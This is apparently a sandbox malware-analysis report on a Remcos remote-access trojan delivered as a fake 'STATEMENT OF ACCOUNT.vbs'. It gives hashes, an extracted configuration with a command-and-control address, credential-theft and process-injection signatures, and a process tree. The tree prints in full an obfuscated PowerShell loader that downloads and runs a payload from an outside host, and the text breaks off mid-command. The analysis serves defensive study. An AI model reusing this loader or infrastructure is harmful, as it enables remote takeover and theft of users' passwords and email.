remcos | a97b49a5796ffeb59416acf31fd256d8990092350bc36b3a5baf9f1e78e3f48f

Analysis

max time kernel
150s
max time network
154s
platform
windows7_x64
resource
win7-20240611-en
resource tags

arch:x64arch:x86image:win7-20240611-enlocale:en-usos:windows7-x64system
submitted
03-07-2024 16:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

STATEMENT OF ACCOUNT.vbs
Size

26KB
MD5

aa6aa1ff2c749570b67fe6c299af0da7
SHA1

ce00d3718d67b145e2953520292d7f230143a8c4
SHA256

e77df90c6642d268ece623b00aae363c8075d9715ddbed1d808d4561772532ec
SHA512

dc26694ec7f3ec408ac4774751e9c3feb43afd826b95e2a782bef239d13116facbe7add9ec0fa3bba26abee8e8039d74e421f27ea06337964fba4f28049c4086
SSDEEP

384:vhkpV0T7xxHYTYdr2veaUeYptuwykaxeWbuwmdCYUmtS9Dm:vKz0TtK2yeFeQuvkWJXwS9Dm

Score

10^/10

remcos remotehost collection rat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

103.237.87.32:1999

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-VEYV6I
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients

Processes:

resource yara_rule

behavioral1/memory/2992-55-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers

Processes:

resource yara_rule

behavioral1/memory/3016-59-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView

resource	yara_rule
behavioral1/memory/2992-55-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

resource	yara_rule
behavioral1/memory/3016-59-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Nirsoft 3 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2296-60-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral1/memory/3016-59-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral1/memory/2992-55-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft

Blocklisted process makes network request 2 IoCs

Processes:

WScript.exepowershell.exe

flow pid process

3 2324 WScript.exe
4 2716 powershell.exe
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
collection

Email Collection
T1114

Processes:

wab.exe

description ioc process

Key opened \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts wab.exe
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

wab.exe

pid process

1496 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exewab.exe

pid process

3048 powershell.exe
1496 wab.exe

flow	pid	process
3	2324	WScript.exe
4	2716	powershell.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	wab.exe

pid	process
1496	wab.exe

pid	process
3048	powershell.exe
1496	wab.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

powershell.exewab.exe

description	pid	process	target process
PID 3048 set thread context of 1496	3048	powershell.exe	wab.exe
PID 1496 set thread context of 3016	1496	wab.exe	wab.exe
PID 1496 set thread context of 2992	1496	wab.exe	wab.exe
PID 1496 set thread context of 2296	1496	wab.exe	wab.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exewab.exe

pid process

2716 powershell.exe
3048 powershell.exe
3048 powershell.exe
3016 wab.exe
3016 wab.exe
Suspicious behavior: MapViewOfSection 4 IoCs

Processes:

powershell.exewab.exe

pid process

3048 powershell.exe
1496 wab.exe
1496 wab.exe
1496 wab.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exewab.exe

description pid process

Token: SeDebugPrivilege 2716 powershell.exe
Token: SeDebugPrivilege 3048 powershell.exe
Token: SeDebugPrivilege 2296 wab.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

wab.exe

pid process

1496 wab.exe

pid	process
2716	powershell.exe
3048	powershell.exe
3048	powershell.exe
3016	wab.exe
3016	wab.exe

pid	process
3048	powershell.exe
1496	wab.exe
1496	wab.exe
1496	wab.exe

description	pid	process
Token: SeDebugPrivilege	2716	powershell.exe
Token: SeDebugPrivilege	3048	powershell.exe
Token: SeDebugPrivilege	2296	wab.exe

pid	process
1496	wab.exe

Suspicious use of WriteProcessMemory 35 IoCs

Processes:

WScript.exepowershell.exepowershell.exewab.exe

description	pid	process	target process
PID 2324 wrote to memory of 2716	2324	WScript.exe	powershell.exe
PID 2324 wrote to memory of 2716	2324	WScript.exe	powershell.exe
PID 2324 wrote to memory of 2716	2324	WScript.exe	powershell.exe
PID 2716 wrote to memory of 3020	2716	powershell.exe	cmd.exe
PID 2716 wrote to memory of 3020	2716	powershell.exe	cmd.exe
PID 2716 wrote to memory of 3020	2716	powershell.exe	cmd.exe
PID 2716 wrote to memory of 3048	2716	powershell.exe	powershell.exe
PID 2716 wrote to memory of 3048	2716	powershell.exe	powershell.exe
PID 2716 wrote to memory of 3048	2716	powershell.exe	powershell.exe
PID 2716 wrote to memory of 3048	2716	powershell.exe	powershell.exe
PID 3048 wrote to memory of 1904	3048	powershell.exe	cmd.exe
PID 3048 wrote to memory of 1904	3048	powershell.exe	cmd.exe
PID 3048 wrote to memory of 1904	3048	powershell.exe	cmd.exe
PID 3048 wrote to memory of 1904	3048	powershell.exe	cmd.exe
PID 3048 wrote to memory of 1496	3048	powershell.exe	wab.exe
PID 3048 wrote to memory of 1496	3048	powershell.exe	wab.exe
PID 3048 wrote to memory of 1496	3048	powershell.exe	wab.exe
PID 3048 wrote to memory of 1496	3048	powershell.exe	wab.exe
PID 3048 wrote to memory of 1496	3048	powershell.exe	wab.exe
PID 3048 wrote to memory of 1496	3048	powershell.exe	wab.exe
PID 1496 wrote to memory of 3016	1496	wab.exe	wab.exe
PID 1496 wrote to memory of 3016	1496	wab.exe	wab.exe
PID 1496 wrote to memory of 3016	1496	wab.exe	wab.exe
PID 1496 wrote to memory of 3016	1496	wab.exe	wab.exe
PID 1496 wrote to memory of 3016	1496	wab.exe	wab.exe
PID 1496 wrote to memory of 2992	1496	wab.exe	wab.exe
PID 1496 wrote to memory of 2992	1496	wab.exe	wab.exe
PID 1496 wrote to memory of 2992	1496	wab.exe	wab.exe
PID 1496 wrote to memory of 2992	1496	wab.exe	wab.exe
PID 1496 wrote to memory of 2992	1496	wab.exe	wab.exe
PID 1496 wrote to memory of 2296	1496	wab.exe	wab.exe
PID 1496 wrote to memory of 2296	1496	wab.exe	wab.exe
PID 1496 wrote to memory of 2296	1496	wab.exe	wab.exe
PID 1496 wrote to memory of 2296	1496	wab.exe	wab.exe
PID 1496 wrote to memory of 2296	1496	wab.exe	wab.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\STATEMENT OF ACCOUNT.vbs"
1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2324

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'haussen Grnseegnen Floorshow Reklamationsperioders Verdensdelenes Dissektioners Hoffrdig Fangehul118 Prerejection Iconicity Dissonans udvide Forbisete Nysseligere Methuen besgslandbrug Tilbagefaldsfeberen Lnregulerings Prioritetsrkkeflgers Edderdunets Sorteringsformen Glamouriseringens Erratics Elephanta105 haussen Grnseegnen Floorshow Reklamationsperioders Verdensdelenes Dissektioners Hoffrdig Fangehul118 Prerejection Iconicity Dissonans udvide Forbisete Nysseligere Methuen besgslandbrug Tilbagefaldsfeberen Lnregulerings Prioritetsrkkeflgers Edderdunets Sorteringsformen Glamouriseringens Erratics Elephanta105';If (${host}.CurrentCulture) {$Gstende229++;}Function Brneaarene($Kontrapunktiske){$Berggyltendentitetens=$Kontrapunktiske.Length-$Gstende229;$Jordskorpen='SUBsTRI';$Jordskorpen+='ng';For( $Berggylten=7;$Berggylten -lt $Berggyltendentitetens;$Berggylten+=8){$haussen+=$Kontrapunktiske.$Jordskorpen.Invoke( $Berggylten, $Gstende229);}$haussen;}function Eschel($Foyerens){ & ($Crotalism) ($Foyerens);}$Conourish=Brneaarene 'StrandiMPyridoxo TidlnnzKthibhsi MarkkalPolysemlsammenbadetekti/Advocat5 .dapti.nondeaf0Sinapis Alarmfu( EstlanWMithridiAnstteln Portiod AzuritoFugientwSikkerhsArquifo DuplikaN BankkuTC.rriva Millimi1Produkt0Preside. Wi eki0Antitet;Affinge argandsWKaffesliSkindfrn.piritl6 Helico4Laughso; Drifts PeasanxInso.ls6Ggepulv4Spermat;Reinter Sub rbirResumeevcomposc:Waywode1Tidsfak2Finansi1 ufferr.eksport0Sgeomra) Overne RedobleGTilvende.lutonocVierlinkPi.dsvio ylleba/Sh,ckwa2Dicetyl0Myelina1Krselsu0Sknjom.0herigen1omdispu0Atomfys1 Miave ulimicFTilsluti SildesrCoincideUncapi.f ga.rrlo ModstaxFitfuln/Vaporin1Udskriv2Landman1Restrai.Oversup0Entangl ';$Beskftigelsesfremgangs=Brneaarene 'Flun.yiUU tornbsbandageeDerivatrCathach-SuborbiAOvibovigMultrumeUdsugninsunkiestAnthoge ';$Verdensdelenes=Brneaarene ' handelhTotipaltHolocentKvalitepRek.isi:udrykni/ Bortop/Madrass1sennesb0Sekundm3Kollegi.Pension2Navlebe3Lbltern7 Honeys. G llan8 Purple6Syskrin.Nedjust2 Geniog4Unprosp7 Jocula/O,osterFsikkerhr Kime,niPrintersPrurigokTrustlep.oldefti Bysa,flNatskiflV,ggevieQuodli,tvrel,ea1Bestvle0Theines9.ythere.OverswedSofthe,w ErminepPrimi.y ';$verdensplanen=Brneaarene 'Tragaca>N heden ';$Crotalism=Brneaarene 'Shadowlicamiseseafhvlenx Unrash ';$Forngtere='Fangehul118';$Parenchymatitis = Brneaarene 'MelerineCountybcQuintelhUm ldesoKlagepu Latterl%GuerinjaUninfuspTr fikkpraketvrdE,ploita SniggotbedrageaChumpaa%Beringa\ Imp.emRGuldbr.eWheelinlbanjerda FejlagtVak,umpiStttes vExt acoaGro.thel rechar.K.esengETegnfejstradefukPlurise Afterbr&Autobus&Ubarber EphemereDebaclecBondepahFlles.noBretagn Konce tBedways ';Eschel (Brneaarene 'Vesterh$Dune,ingCentipelI.doeuroscho lmbInterfia Cten,cl L folk: Blod eB R.abdoa ,utrilt KedsomhEjerin.yCranio b TralleiAssumptu Repr ss Besynd=Asperug(BoothagcunsobermCanephrd Opstan Snowbo,/Byld,iacSkatter Fornrme$Diskod P eassuaParago,r mistnkeUltragenTownfolc U,renshDaktylky Akk,rdmEnkeltsaTppefaltPatriari OmbygntExo,asti Kinetis.anthop)Cr denc ');Eschel (Brneaarene 'Dvekons$Kultiveg Udsteml Triviao Unflatb OpslugaUnflakyl So,ver:Ko,statRClosab eInitialkvedligelC landea ThesenmMi.lijoaWangalatconsideiProgramo U,clounAcetopys Albylep RavneaeVejenshrSe vejei Anekdoo Salta dMolestee S percrsynkronsFrek.en=Tapetse$NabointVS aantae AlcidarPlumuled CremoreRituallnJordbessCommu,id F.elyaeGdningslDusrensePaapegenF,ssilaeMeldbarsTranslu.KlyngehsDicoelop vkstc.lS,oleveiTilskuetBlaareg( Udtaps$ Be.alivFina,smeAscenderTerrestdRetentieHunde.yncacozeasIn.ratepNaturfrlBemgtiga Conf tnHedvineeNonhumonAnemoch)Minimer ');Eschel (Brneaarene 'R,kvire[ V,netiNUncentre subinttHirdens.PostcomSVarmhjeeEss nitrTilknytvs,bcostiBra,dercspans.ge.tomachP BnkensoGeronteiKlagemanSpy,destCausa,iMCirroseaLeucoenn.ockatiaHummelsgSeco.deeDdsfjenr Abnorm]Overnat:Jejunac:perspirSBlinka e,frikancKi.iernu Undevers,rfabliHoydalatTilr,ngyHdqrssiPOpvindsrOpholdso PersiltTeendeooUd,ajercTeknolooBilb.salRejsnin Dirig.=Lammels O eyesk[AandemaN Sl dreeToppenot ,stnin.RangensSAcquireePrognoscArquebuuAftgtsfr SkarptiFejl,eht S,denvyTizwinpPf.ugtburSigna.roRegistetBoremeso OplevpcLigkistoR.sflell MaanedTGastrosySulfin pNonrecie Roccel]Formern: oxalg:Forsaa.TPreequalAk,ionssFedtema1Straike2Hallecr ');$Verdensdelenes=$Reklamationsperioders[0];$Countervolition= (Brneaarene ' Lauryl$ToylikegTan espl flyveioGinnerybMil.eusaGaufreulGynopha:PhenolsO AntipymZymoteclAficionbTrustabeVis,alit MicrossKorrump1 R,ssop7L ntibu0 Lalaqu=Pante nNGearskieVingesuwWheensp-SubdisjO Krostub ThroeijTransvaeFordelicSemihumtDis mpa IldkuglS,smotheyPotmenlsQuerie.tDitch ie S oppemGrubler.PistillNindsatdeUparti tReuchli. LuggagWSoodlybeJosva.mbOikophoCBrnefamlMizenmai Dan ase Operatn barkast');$Countervolition+=$Bathybius[1];Eschel ($Countervolition);Eschel (Brneaarene 'Ly.ebru$TilbageOTorulosmS,riverlFjordrebStat gaeI,trodut,arlrsts Jefkan1Trachel7Vakante0Hukomme.MeikensHUnvibraeLixiv.aa JakostdFe,ffeeeFon.sbrrdokumens,ilmret[Exorabl$UnderscBsomervieSekvenssD,dsmnskgenevoifFo,handtC,ncertiSatsbilgCyderree TrisublSummer sMisdia.eAvickbesSpumie.fMu ychirBunse,be Ghostsm Mu,difgBeautifaLockspinGeodifegEnergims,jresla]Hyp.rle= Teglhn$Gruppe.CIn.esteoSunglown.algenhoFreshenu pringrDagplejiDepl,yes inuathSmaragd ');$Fejldisponere=Brneaarene ' Con.ti$StadsgaOAarsskimI,coordlPlanndrbOpstarteServicetLepismasUskarpe1 Ston.i7 Skatte0platyce..ormaliDProvokeoTek tbewHu holdnFllede,lDisplacoJackweeaTetanisdPancreaFlousiesiforudsal,isorgaeVold,gt( egreg$EtcmodsVgabardieNytteomrW.xmakidInduceaeScoringn Fi.kersAcorusadS.epheneSvidni.lWitesgleAme,icanRokadeneMonarchsIndklam,Vandpyt$ RegulaG lasmaelG stroeaAcceptimCliqu,dogrundlouFlovendrPathnami Trep.nsSjungene ridninrJudaizeiSkder enObsessig statsheSerapianThecitysPist,ns)Pinn cl ';$Glamouriseringens=$Bathybius[0];Eschel (Brneaarene 'Bo dsme$Dis.rimgFemmernlOtherwooOrsellibGlucon,aRevelablBib.lsk: ThaineUKooperadFishhoupZ buenirStambgeeUnquerisPreemptn.zardomiAnnemarnP,tensegSkuldereN nillunAfstb i=N,aletr(in exteT,etalloeFuglekasFlg.sedtUdlseud-PolitiaPAzerbaiaCeliad.tSkoann.hUdslgen Tuck e$ Smgen GGearvlglSomewhaaYder ldmIndledeoOutsiz,uUindskrr.etvrkei EftermsOmskoleeDistingrAdgangsiPlankevnDankdamg Tuli aeconacr,n Ca.pebsProck.h),herecr ');while (!$Udpresningen) {Eschel (Brneaarene 'anthra $ AadselgUdgravelK,inteto.ygiejnbFrib,biaProtocol fodbol:Perple S DuraintR tileao F.yverlCommunalRel ableHelbredrhaemninnSubentre Ov,rjusrusland= mislab$Se ondetPoliturr Subs.duForp.gteV.ndica ') ;Eschel $Fejldisponere;Eschel (Brneaarene 'UnslopiS urdrumtContermaDisput,rPhotosctIn,anta-.andsetSSj esrgl EscalaeChecksuepolar.sp iarrho Boorish4Overde, ');Eschel (Brneaarene ' Photos$G,atitugStevenel Huberto Phelonb A.klagaNonj dilU.deror: caripUForu.end Rvegrap .emihurblollyde Arb jds .thrognTerapeuiDagdrmmn Ag,onogRorpindeLavlandnHeloder=Bnkerad( .horiaTCaughtse SyersksDilatattSivskoe-ArbejdsPUnibraca MicroftBranddahOpretho Uncha t$AabenheG SubdollSilketjaSlrenepmUnyoungo,enessauAltankarAf.nstriTekstfeshenfaldeVandfalrTrach.li DannelnSuprastgFuldrigeEjendomn raftvrs Saalbn)indhfte ') ;Eschel (Brneaarene 'Stummer$PredestgIdrtsanlGudl.epoBretessbU appeaaAppelinlReplnec:StorhedFTelefonlMoniliaoUngdom,oM crocerTmningss.plagrihTrlb.ndoResen.iwExodysm= Dehyd $ StrandgSanctimlMotonaboLaesbarbmarig,aaSmagss lFanatic: InositG.eboelsr VariatnAandsars FrdiggeTolerabeFing,rsgProredenKrebaneeClytus.n,arnumi+ Trimel+tve,and%M.stere$Roug.stR StatleeAmpexfokRidsninlpseud.saFototelmSbekassa Ordstrt shoppeiirreligoTuerrornTids.krs TenparpKassesveAdmonitrHemagogiBibemrko Bilagsdpicturae Trkd.rrTilbagesM litar. ChristcSesquino.yrkenmuCantdognTvetyditO.turat ') ;$Verdensdelenes=$Reklamationsperioders[$Floorshow];}$Subtract=338547;$Procedurens=31347;Eschel (Brneaarene ' Skumls$polyisogTia.medlV duateobattlesbSooti yaDoctrinlP,ecilo: fortalPtripersrBro.kereVelseterOut laye Driftsj OphreteInsobricRelatiotDition iOysterio Coa.fanHinshou Iltma,=.andels pho omeGXenogene TjsnortScombri-tandtekCKostskooEfterginChand ltOpstvenecomoidsnBetjentt Thooca Sttyske$ belahcGNadj molKlynkeha Glaspum PanidroDisent uPinenssrPe isariSlambassMotorhjeEngracirJenspeciS,nitarnAf,erwigTrekanteAgriolonGranulashandels ');Eschel (Brneaarene ' P.lles$NonadjugGuldrinlYngled,o bredejbBremseraUtaknemldraperf: stomapTFistre.oVoicerrmProduktlQuipsteeRetirinnRadioscdPro.osieOptagebs Anrett Sideomb=Feriere Twinho[ ,oloniSNaturloyBemrkensTilfoejt Kokk,peStudsnimtomahav.,rogramCwrigjrgo U.adhenSygeeksvGendarmerevolter AbashetTilegne] Brsteo: Kasser: permafFSprjt,lr bl,ebaoCompendminhalatBReboleraEmpassisDoorbele Hoota 6 Hollyw4bowleggSRemovertMonarkerProce.ei DeindinJulequig Forvar(Inst,nt$ SubtilPKon rolrCitole eSend mnrAabenbae Antecej ,imreseTubigancSportsgtUtilsteiTaffelboSkolepsn Re,xpo) Opgav ');Eschel (Brneaarene ' Semirh$B,ningsgDoserinlUnuanceoRiflerfb Rfsunca aa enblSatirep: D,uggeu PuseyedFactorivTroke oiMuckwordKul.urkeAbonnem Ac cia=,onbook Overtr[,ebatinSGagerinyGnom.nds AastedtMonocule.utrankmKa,otte.Regul.tTprocureeOpsaetnxphilobitFidibus.ForbogsEVovhundnUgengldcTekstkooForsnakdNitrogliMe.tesrnsuppedegUnbiass]Sttters:Udvoks :ChloranABowwortSS eretnCIndgaarIAnaglypISamf.nd.CollingG tannoge LacerttCurioloS,olkesatKretiskrC,gnituiRingbrynRupeesvgdisting( wel,er$SvarfriTCatech oBlousegmKnapbotlHurtigteDeskripnC cinerd F lkete Kle.tosTorchma) Misspe ');Eschel (Brneaarene 'Waliser$ Le,onsg eutrallAckmanboM,sfondb Pha.taaNavnelilsemivol:PopulisTSt,ftsfrCopolymaDaktyloaBurgerbdTiereranPr.cumbe YverettFejlerntRecapskeTa.demmtMillboasMet.llo=Bippern$YndestcuProb,scd NaturevGodsbaniExocycldFu,dmgteKrselso.Tilk ndsOpvelseuVandforbBegyndesFaconsttNongarrrstoejsii kurtisnPari.etgPrevisi(D kende$Cal.bitSThel,rruDrvepoebPo itict Misantr Ep,uleaIndrykncForsikrtIllogic, itter$,ombardPunpla.trSengekaooftennecPreparoeDetailsdchildriu FyldenrBegrende RaadignFalk,sas Hjemme)Skibbru ');Eschel $Traadnettets;"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2716

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Relatival.Esk && echo t"
3⤵
PID:3020

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'haussen Grnseegnen Floorshow Reklamationsperioders Verdensdelenes Dissektioners Hoffrdig Fangehul118 Prerejection Iconicity Dissonans udvide Forbisete Nysseligere Methuen besgslandbrug Tilbagefaldsfeberen Lnregulerings Prioritetsrkkeflgers Edderdunets Sorteringsformen Glamouriseringens Erratics Elephanta105 haussen Grnseegnen Floorshow Reklamationsperioders Verdensdelenes Dissektioners Hoffrdig Fangehul118 Prerejection Iconicity Dissonans udvide Forbisete Nysseligere Methuen besgslandbrug Tilbagefaldsfeberen Lnregulerings Prioritetsrkkeflgers Edderdunets Sorteringsformen Glamouriseringens Erratics Elephanta105';If (${host}.CurrentCulture) {$Gstende229++;}Function Brneaarene($Kontrapunktiske){$Berggyltendentitetens=$Kontrapunktiske.Length-$Gstende229;$Jordskorpen='SUBsTRI';$Jordskorpen+='ng';For( $Berggylten=7;$Berggylten -lt $Berggyltendentitetens;$Berggylten+=8){$haussen+=$Kontrapunktiske.$Jordskorpen.Invoke( $Berggylten, $Gstende229);}$haussen;}function Eschel($Foyerens){ & ($Crotalism) ($Foyerens);}$Conourish=Brneaarene 'StrandiMPyridoxo TidlnnzKthibhsi MarkkalPolysemlsammenbadetekti/Advocat5 .dapti.nondeaf0Sinapis Alarmfu( EstlanWMithridiAnstteln Portiod AzuritoFugientwSikkerhsArquifo DuplikaN BankkuTC.rriva Millimi1Produkt0Preside. Wi eki0Antitet;Affinge argandsWKaffesliSkindfrn.piritl6 Helico4Laughso; Drifts PeasanxInso.ls6Ggepulv4Spermat;Reinter Sub rbirResumeevcomposc:Waywode1Tidsfak2Finansi1 ufferr.eksport0Sgeomra) Overne RedobleGTilvende.lutonocVierlinkPi.dsvio ylleba/Sh,ckwa2Dicetyl0Myelina1Krselsu0Sknjom.0herigen1omdispu0Atomfys1 Miave ulimicFTilsluti SildesrCoincideUncapi.f ga.rrlo ModstaxFitfuln/Vaporin1Udskriv2Landman1Restrai.Oversup0Entangl ';$Beskftigelsesfremgangs=Brneaarene 'Flun.yiUU tornbsbandageeDerivatrCathach-SuborbiAOvibovigMultrumeUdsugninsunkiestAnthoge ';$Verdensdelenes=Brneaarene ' handelhTotipaltHolocentKvalitepRek.isi:udrykni/ Bortop/Madrass1sennesb0Sekundm3Kollegi.Pension2Navlebe3Lbltern7 Honeys. G llan8 Purple6Syskrin.Nedjust2 Geniog4Unprosp7 Jocula/O,osterFsikkerhr Kime,niPrintersPrurigokTrustlep.oldefti Bysa,flNatskiflV,ggevieQuodli,tvrel,ea1Bestvle0Theines9.ythere.OverswedSofthe,w ErminepPrimi.y ';$verdensplanen=Brneaarene 'Tragaca>N heden ';$Crotalism=Brneaarene 'Shadowlicamiseseafhvlenx Unrash ';$Forngtere='Fangehul118';$Parenchymatitis = Brneaarene 'MelerineCountybcQuintelhUm ldesoKlagepu Latterl%GuerinjaUninfuspTr fikkpraketvrdE,ploita SniggotbedrageaChumpaa%Beringa\ Imp.emRGuldbr.eWheelinlbanjerda FejlagtVak,umpiStttes vExt acoaGro.thel rechar.K.esengETegnfejstradefukPlurise Afterbr&Autobus&Ubarber EphemereDebaclecBondepahFlles.noBretagn Konce tBedways ';Eschel (Brneaarene 'Vesterh$Dune,ingCentipelI.doeuroscho lmbInterfia Cten,cl L folk: Blod eB R.abdoa ,utrilt KedsomhEjerin.yCranio b TralleiAssumptu Repr ss Besynd=Asperug(BoothagcunsobermCanephrd Opstan Snowbo,/Byld,iacSkatter Fornrme$Diskod P eassuaParago,r mistnkeUltragenTownfolc U,renshDaktylky Akk,rdmEnkeltsaTppefaltPatriari OmbygntExo,asti Kinetis.anthop)Cr denc ');Eschel (Brneaarene 'Dvekons$Kultiveg Udsteml Triviao Unflatb OpslugaUnflakyl So,ver:Ko,statRClosab eInitialkvedligelC landea ThesenmMi.lijoaWangalatconsideiProgramo U,clounAcetopys Albylep RavneaeVejenshrSe vejei Anekdoo Salta dMolestee S percrsynkronsFrek.en=Tapetse$NabointVS aantae AlcidarPlumuled CremoreRituallnJordbessCommu,id F.elyaeGdningslDusrensePaapegenF,ssilaeMeldbarsTranslu.KlyngehsDicoelop vkstc.lS,oleveiTilskuetBlaareg( Udtaps$ Be.alivFina,smeAscenderTerrestdRetentieHunde.yncacozeasIn.ratepNaturfrlBemgtiga Conf tnHedvineeNonhumonAnemoch)Minimer ');Eschel (Brneaarene 'R,kvire[ V,netiNUncentre subinttHirdens.PostcomSVarmhjeeEss nitrTilknytvs,bcostiBra,dercspans.ge.tomachP BnkensoGeronteiKlagemanSpy,destCausa,iMCirroseaLeucoenn.ockatiaHummelsgSeco.deeDdsfjenr Abnorm]Overnat:Jejunac:perspirSBlinka e,frikancKi.iernu Undevers,rfabliHoydalatTilr,ngyHdqrssiPOpvindsrOpholdso PersiltTeendeooUd,ajercTeknolooBilb.salRejsnin Dirig.=Lammels O eyesk[AandemaN Sl dreeToppenot ,stnin.RangensSAcquireePrognoscArquebuuAftgtsfr SkarptiFejl,eht S,denvyTizwinpPf.ugtburSigna.roRegistetBoremeso OplevpcLigkistoR.sflell MaanedTGastrosySulfin pNonrecie Roccel]Formern: oxalg:Forsaa.TPreequalAk,ionssFedtema1Straike2Hallecr ');$Verdensdelenes=$Reklamationsperioders[0];$Countervolition= (Brneaarene ' Lauryl$ToylikegTan espl flyveioGinnerybMil.eusaGaufreulGynopha:PhenolsO AntipymZymoteclAficionbTrustabeVis,alit MicrossKorrump1 R,ssop7L ntibu0 Lalaqu=Pante nNGearskieVingesuwWheensp-SubdisjO Krostub ThroeijTransvaeFordelicSemihumtDis mpa IldkuglS,smotheyPotmenlsQuerie.tDitch ie S oppemGrubler.PistillNindsatdeUparti tReuchli. LuggagWSoodlybeJosva.mbOikophoCBrnefamlMizenmai Dan ase Operatn barkast');$Countervolition+=$Bathybius[1];Eschel ($Countervolition);Eschel (Brneaarene 'Ly.ebru$TilbageOTorulosmS,riverlFjordrebStat gaeI,trodut,arlrsts Jefkan1Trachel7Vakante0Hukomme.MeikensHUnvibraeLixiv.aa JakostdFe,ffeeeFon.sbrrdokumens,ilmret[Exorabl$UnderscBsomervieSekvenssD,dsmnskgenevoifFo,handtC,ncertiSatsbilgCyderree TrisublSummer sMisdia.eAvickbesSpumie.fMu ychirBunse,be Ghostsm Mu,difgBeautifaLockspinGeodifegEnergims,jresla]Hyp.rle= Teglhn$Gruppe.CIn.esteoSunglown.algenhoFreshenu pringrDagplejiDepl,yes inuathSmaragd ');$Fejldisponere=Brneaarene ' Con.ti$StadsgaOAarsskimI,coordlPlanndrbOpstarteServicetLepismasUskarpe1 Ston.i7 Skatte0platyce..ormaliDProvokeoTek tbewHu holdnFllede,lDisplacoJackweeaTetanisdPancreaFlousiesiforudsal,isorgaeVold,gt( egreg$EtcmodsVgabardieNytteomrW.xmakidInduceaeScoringn Fi.kersAcorusadS.epheneSvidni.lWitesgleAme,icanRokadeneMonarchsIndklam,Vandpyt$ RegulaG lasmaelG stroeaAcceptimCliqu,dogrundlouFlovendrPathnami Trep.nsSjungene ridninrJudaizeiSkder enObsessig statsheSerapianThecitysPist,ns)Pinn cl ';$Glamouriseringens=$Bathybius[0];Eschel (Brneaarene 'Bo dsme$Dis.rimgFemmernlOtherwooOrsellibGlucon,aRevelablBib.lsk: ThaineUKooperadFishhoupZ buenirStambgeeUnquerisPreemptn.zardomiAnnemarnP,tensegSkuldereN nillunAfstb i=N,aletr(in exteT,etalloeFuglekasFlg.sedtUdlseud-PolitiaPAzerbaiaCeliad.tSkoann.hUdslgen Tuck e$ Smgen GGearvlglSomewhaaYder ldmIndledeoOutsiz,uUindskrr.etvrkei EftermsOmskoleeDistingrAdgangsiPlankevnDankdamg Tuli aeconacr,n Ca.pebsProck.h),herecr ');while (!$Udpresningen) {Eschel (Brneaarene 'anthra $ AadselgUdgravelK,inteto.ygiejnbFrib,biaProtocol fodbol:Perple S DuraintR tileao F.yverlCommunalRel ableHelbredrhaemninnSubentre Ov,rjusrusland= mislab$Se ondetPoliturr Subs.duForp.gteV.ndica ') ;Eschel $Fejldisponere;Eschel (Brneaarene 'UnslopiS urdrumtContermaDisput,rPhotosctIn,anta-.andsetSSj esrgl EscalaeChecksuepolar.sp iarrho Boorish4Overde, ');Eschel (Brneaarene ' Photos$G,atitugStevenel Huberto Phelonb A.klagaNonj dilU.deror: caripUForu.end Rvegrap .emihurblollyde Arb jds .thrognTerapeuiDagdrmmn Ag,onogRorpindeLavlandnHeloder=Bnkerad( .horiaTCaughtse SyersksDilatattSivskoe-ArbejdsPUnibraca MicroftBranddahOpretho Uncha t$AabenheG SubdollSilketjaSlrenepmUnyoungo,enessauAltankarAf.nstriTekstfeshenfaldeVandfalrTrach.li DannelnSuprastgFuldrigeEjendomn raftvrs Saalbn)indhfte ') ;Eschel (Brneaarene 'Stummer$PredestgIdrtsanlGudl.epoBretessbU appeaaAppelinlReplnec:StorhedFTelefonlMoniliaoUngdom,oM crocerTmningss.plagrihTrlb.ndoResen.iwExodysm= Dehyd $ StrandgSanctimlMotonaboLaesbarbmarig,aaSmagss lFanatic: InositG.eboelsr VariatnAandsars FrdiggeTolerabeFing,rsgProredenKrebaneeClytus.n,arnumi+ Trimel+tve,and%M.stere$Roug.stR 